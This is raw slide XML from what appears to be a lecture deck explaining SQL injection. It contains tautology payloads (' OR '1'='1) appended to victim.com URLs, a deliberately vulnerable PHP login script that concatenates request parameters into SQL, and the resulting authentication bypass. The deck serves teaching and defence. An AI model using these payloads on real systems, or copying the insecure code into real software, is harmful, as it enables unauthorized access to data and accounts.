        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1831975" y="7938"/>
            <a:ext cx="304800" cy="304801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-GB"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="6" name="AutoShape 6" descr="image"/>
          <p:cNvSpPr>
            <a:spLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1984375" y="160338"/>
            <a:ext cx="304800" cy="304801"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" wrap="square" lIns="91440" tIns="45720" rIns="91440" bIns="45720" numCol="1" anchor="t" anchorCtr="0" compatLnSpc="1"/>
          <a:lstStyle/>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715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Understanding SQL Injection – Example 1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="914400"/>
            <a:ext cx="8686800" cy="5867400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The primary form of SQL injection consists of direct insertion of code into parameters that are concatenated with SQL commands and executed. </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>When a Web application fails to properly sanitize the parameters which are passed to dynamically created SQL statements it is possible for an attacker to alter the construction of back-end SQL statements.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>In our example, we attempted to view all products within the store that cost less than £100, by using the following URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/products.php?val=100</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>This example will attempt to append the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>‘ OR ‘1’= ‘1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to the URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>products.php?val</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=100’ OR ‘1’ =‘1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The SQL statement that the PHP script builds and executes will return all of the products in the database regardless of their price. This is because you have altered the logic of the query: the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>OR</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> operand of the query </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>always returns </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>true</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>(1 will always be equal to 1). Here is the query that was built and executed:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1515" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT ∗</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1515" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1515" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1515" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProductsTbl</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1515" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1515" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE Price &lt; ‘100’ OR ‘1’ = ‘1’</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1515" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" sz="1515" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ORDER BY </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1515" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>ProductDescription</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="1515" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="1515" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-GB" sz="151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715962"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Understanding SQL Injection – Example 2</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="838200"/>
            <a:ext cx="8686800" cy="5867400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>What if the same application allows users to login and manage their profiles using the following URL: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/cms/login.php?user=foo&amp;password=bar</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Here is the code for the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> script:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// connect to the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$conn = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_connect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>(“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>localhost</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”,“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>username”,“password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// dynamically build the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> statement with the input</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$query = “SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CMSUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> WHERE user = ‘$_GET[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”]’ ”.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  “AND password = ‘$_GET[“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”]’”;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// execute the query against the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$result = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_query</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($query);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// check to see how many rows were returned from the database</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rowcount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>mysql_num_rows</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($result);</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// if a row is returned then the credentials must be valid, so</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// forward the user to the admin pages</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>if ($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rowcount</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t> ! = 0){header(“Location: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>admin.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>”);}</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>// if a row is not returned then the credentials must be invalid</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="800100" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>else {die(‘Incorrect username or password, please try again.’)}</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1"/>
              <a:t>login.php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> script dynamically creates an SQL statement that will return a record set if a username and matching password are entered. </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8686800" cy="563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Understanding SQL Injection – </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2800" dirty="0"/>
              <a:t>Example</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1676400" y="1066800"/>
            <a:ext cx="8839200" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The problem with the code is that the application developer believes the number of records returned when the script is executed will always be zero or one. By appending the string </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0"/>
              <a:t>‘OR ‘1’=’1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> to the URL, the SQL statement will return all </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>userids</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>http://www.victim.com/cms/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>login.php?user</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0" err="1">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>foo&amp;password</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" sz="2400" dirty="0">
                <a:hlinkClick r:id="rId1"/>
              </a:rPr>
              <a:t>=bar’ OR ‘1’=‘1</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" sz="2400" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Here is the query that was built and executed:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>userid</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>FROM </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>CMSUsers</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="400050" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>WHERE user = ‘foo’ AND password = ‘password’ OR ‘1’ = ‘1’;</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx2"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The logic of the application means that if the database returns more than zero records, we must have entered the correct authentication credentials. We will normally be logged in as the first user in the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" i="1" dirty="0" err="1"/>
              <a:t>CMSUsers</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t> table. </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50838"/>
            <a:ext cx="8229600" cy="563562"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQL injection vulnerabilities</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1752600" y="914400"/>
            <a:ext cx="8610600" cy="5562600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>SQL injection vulnerabilities most commonly occur when the Web application developer does not ensure that values received from a Web form, input parameter… are validated before passing them to the database server.</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>The vulnerabilities to SQL Injection are generally down to:</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-GB" dirty="0"/>
              <a:t>Incorrectly handled escape characters</a:t>
            </a:r>
            <a:endParaRPr lang="en-GB" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="914400" lvl="1" indent="-514350">
              <a:buFont typeface="+mj-lt"/>
